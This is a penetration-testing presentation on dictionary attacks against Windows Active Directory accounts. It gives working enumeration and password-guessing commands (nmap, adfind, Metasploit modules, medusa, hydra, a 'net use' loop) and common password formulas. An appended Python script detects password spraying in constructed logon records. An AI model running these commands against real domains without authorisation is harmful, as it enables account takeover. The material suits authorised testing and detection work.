
Introduction to Windows Dictionary Attacks


In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:

Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack

More security blogs by the authors can be found @


1. Introduction to Windows Dictionary Attacks
   Author: Scott Sutherland

2. Who am I?
   Scott Sutherland
   • Principal Security Consultant @ NetSPI
   • Over 10 years of consulting experience
   • Security researcher: blogs, white papers, tools, etc.

3. Presentation Goals
   • Identify the value of dictionary attacks
   • Provide new penetration testers with a safe approach to Windows dictionary attacks
   • Provide security professionals with questions they should be asking their contractors

4. Before we begin…
   Dictionary Attack vs. Brute Force Attack

5. Why dictionary attacks?
   What are the goals?
   • Identify accounts configured with weak or default passwords ("It's human nature")
   • Use accounts as entry points during penetration tests
   What's the impact?
   • Unauthorized access to critical systems, applications and data
   • User impersonation

6. Are There Alternatives?
   Yes. Approaches typically include:
   • Cracking password hashes offline with:
     ‒ Pre-computed hash libraries like rainbow tables
     ‒ Brute-force and dictionary techniques using tools like Hashcat and John the Ripper
   • Dumping clear-text passwords for interactive sessions with Mimikatz

7. Dictionary Attacks: Process Overview
   Windows Dictionary Attack Process
   1. Identify domains
   2. Enumerate domain controllers
   3. Enumerate domain users
   4. Enumerate domain lockout policy
   5. Create a dictionary
   6. Perform attack
8. Identify Domains: Methods
   Unauthenticated Methods
   • DHCP information
   • NetBIOS queries
   • DNS queries
   • Sniffing network traffic
   • Review RDP drop-down lists
   Authenticated Methods
   • Review the output of the SET command for "USERDNSDOMAIN"
   • Review the registry for the default domain

9. Identify Domains: Tools (Method [Auth required]: Tools)
   • DHCP Info [Auth: No]: IPCONFIG
   • NetBIOS Queries [Auth: No]: NBTSTAT -A <IP>
   • DNS Queries [Auth: No]: nmap -sL <IP Range> -oA output_rnds; ./reverseraider -r <IP Range>; ./dnswalk; perl -dns <domainname> -threads 5 -file <domainname>-dns.output
   • Sniffing [Auth: No]: Wireshark (GUI) with a filter for browser traffic; Network Monitor (GUI); Etherape (GUI)
   • RDP Drop Down [Auth: No]: nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client

10. Enumerate DCs: Methods
    Unauthenticated Methods
    • DNS queries
    • RPC queries
    • Port scanning
    • NetBIOS scanning
    Authenticated Methods
    • NET GROUP commands
    • LDAP queries

11. Enumerate DCs: Tools (Method [Auth required]: Tools)
    • DNS Queries [Auth: No]: NSLOOKUP -type=SRV _ldap._tcp.<domain>
    • RPC Queries [Auth: No]: NLTEST /DCLIST <domain>; FindPDC <domain> <request count>
    • Port Scanning [Auth: No]: NMAP -sS -p389,636 -PN <IP Range>
    • NetBIOS Scanning [Auth: No]: FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
    • NET GROUP Command [Auth: Yes]: Net group "Domain Controllers" /domain
    • LDAP Queries [Auth: Yes & No]: LDAP Administrator (GUI tool); Hyena (GUI tool); adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
12. Enumerate Domain Users: Methods
    Unauthenticated Methods
    • RPC queries
    • SID brute forcing
    • SNMP queries
    • LDAP queries
    • SharePoint fuzzing
    Authenticated Methods
    • NET USER command
    • WMI commands

13. Enumerate Domain Users: Tools 1 (Method [Auth required]: Tools)
    • RPC Endpoints [Auth: Yes & No]: dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt; enum -N <ip>; enum -U <ip>
    • SID Brute Forcing [Auth: Yes & No]: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt; Getacct (GUI)
    • SNMP Queries [Auth: Yes & No]: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E; Mibbrowser (GUI); SNMP Walk

14. Enumerate Domain Users: Tools 2 (Method [Auth required]: Tools)
    • LDAP Queries [Auth: Yes & No]: adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
    • SharePoint Fuzzing [Auth: Yes & No]: Fuzz parameters with Burp to enumerate domain users. Example URL: https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
    • NET USERS Command [Auth: Yes]: Net users /domain > domain_users.txt
    • WMI Commands [Auth: Yes]: wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt

15. Get Domain Lockout Policy: Methods
    Unauthenticated Methods
    • RPC endpoints
    Authenticated Methods
    • NET ACCOUNTS command
    What does it all mean?
    • Threshold, duration, and window
    Example policy: Lockout threshold: 5; Lockout duration: 15; Lockout observation window: 15

16. Get Domain Lockout Policy: Tools (Method [Auth required]: Tools)
    • RPC Queries [Auth: Yes & No]: Enum -P <IP Address>; dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
    • NET ACCOUNTS Command [Auth: Yes]: NET ACCOUNTS
17. Create a Dictionary: Methods
    Classics Still Work
    • Blank
    • Username as password
    • password
    Common Formulas = Most Effective
    • <Password><Number>
    • <Companyname><Number>
    • <Season><Year>
    • <Sports team><Number>
    Popular Dictionaries
    • Metasploit dictionaries
    • RockYou
    • FuzzDB
    • John the Ripper

18. Create a Dictionary: Tools (Dictionary: URLs / Lists)
    • Classics: blank password; username as password; password as password
    • Formulas: <Password><Number>; <Companyname><Number>; <Season><Year>; <Sports team><Number>
    • Your Brain! Think of keywords relative to the target company / geographic location and you'll get more out of your dictionary attacks!
    • Popular dictionaries: John the Ripper

19. Perform Dictionary Attack: Rules
    The Rule to Live By: Respect the lockout policy
    • General idea: attempt a few passwords for all of the domain users each round, not 1000 passwords against one user
    • Subtract 2 attempts from the lockout policy. Example: Lockout=5, Attempts=3
    • Wait 5 to 10 minutes beyond the observation window

20. Perform Dictionary Attack: Tools (Tool [OS]: Command)
    • Medusa [Linux]: medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
    • Bruter [Windows]: Easy-to-use GUI; no CLI that I know of.
    • Metasploit smb_login [Windows and Linux]: ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS= E
    • Hydra [Windows and Linux]: hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
    • Batch Script [Windows]: FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a

21. Conclusions
    • There is more than one way to do everything!
    • Enumerate all available options
    • It's easy to lock out accounts: respect the password policy
    • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
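The rule on slide 19 (a few attempts per account across every domain user per round, spaced by the observation window) keeps every account's bad-password counter below the threshold, which is also why per-account lockout alerts never see it. The following is an added example, not part of the presentation: it runs a cross-account check over constructed, simplified failed-logon records (timestamp, source, target user) and flags any source that fails against many distinct accounts inside one observation window, reporting whether it stayed under the slide's example threshold of 5.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                       # example policy from the slides
OBSERVATION_WINDOW = timedelta(minutes=15)  # example observation window

def constructed_sample():
    """Constructed records (not real logs): 'timestamp,source_ip,target_user'.
    10.0.0.50 tries 3 passwords against 12 accounts; 10.0.0.7 mistypes twice."""
    base = datetime(2013, 3, 1, 9, 0, 0)
    users = [f"user{n:02d}" for n in range(12)]
    lines, n = [], 0
    for _ in range(3):                      # 3 per account: stays under threshold
        for u in users:
            lines.append(f"{(base + timedelta(seconds=n)).isoformat()},10.0.0.50,{u}")
            n += 1
    for sec in (120, 150):
        lines.append(f"{(base + timedelta(seconds=sec)).isoformat()},10.0.0.7,user03")
    return "\n".join(lines)

def parse_events(text):
    """Parse records into (datetime, source, user) tuples, skipping blank lines."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, src, user = line.split(",")
            events.append((datetime.fromisoformat(ts), src, user))
    return events

def find_spray_sources(events, window=OBSERVATION_WINDOW, min_users=10, threshold=LOCKOUT_THRESHOLD):
    """Return {source: (distinct_users, max_failures_per_user, under_threshold)} for
    sources failing against >= min_users accounts inside one window. A lockout-aware
    spray never trips per-account counters; only this cross-account view shows it."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((ts, user))
    flagged = {}
    for src, items in by_src.items():
        items.sort()
        for i, (start, _) in enumerate(items):   # slide the window over each start
            per_user = defaultdict(int)
            for ts, user in items[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users:
                worst = max(per_user.values())
                flagged[src] = (len(per_user), worst, worst < threshold)
                break
    return flagged
```

Against exported 4625 events mapped to the same three fields, min_users is the knob that separates a spray from a handful of honest typos.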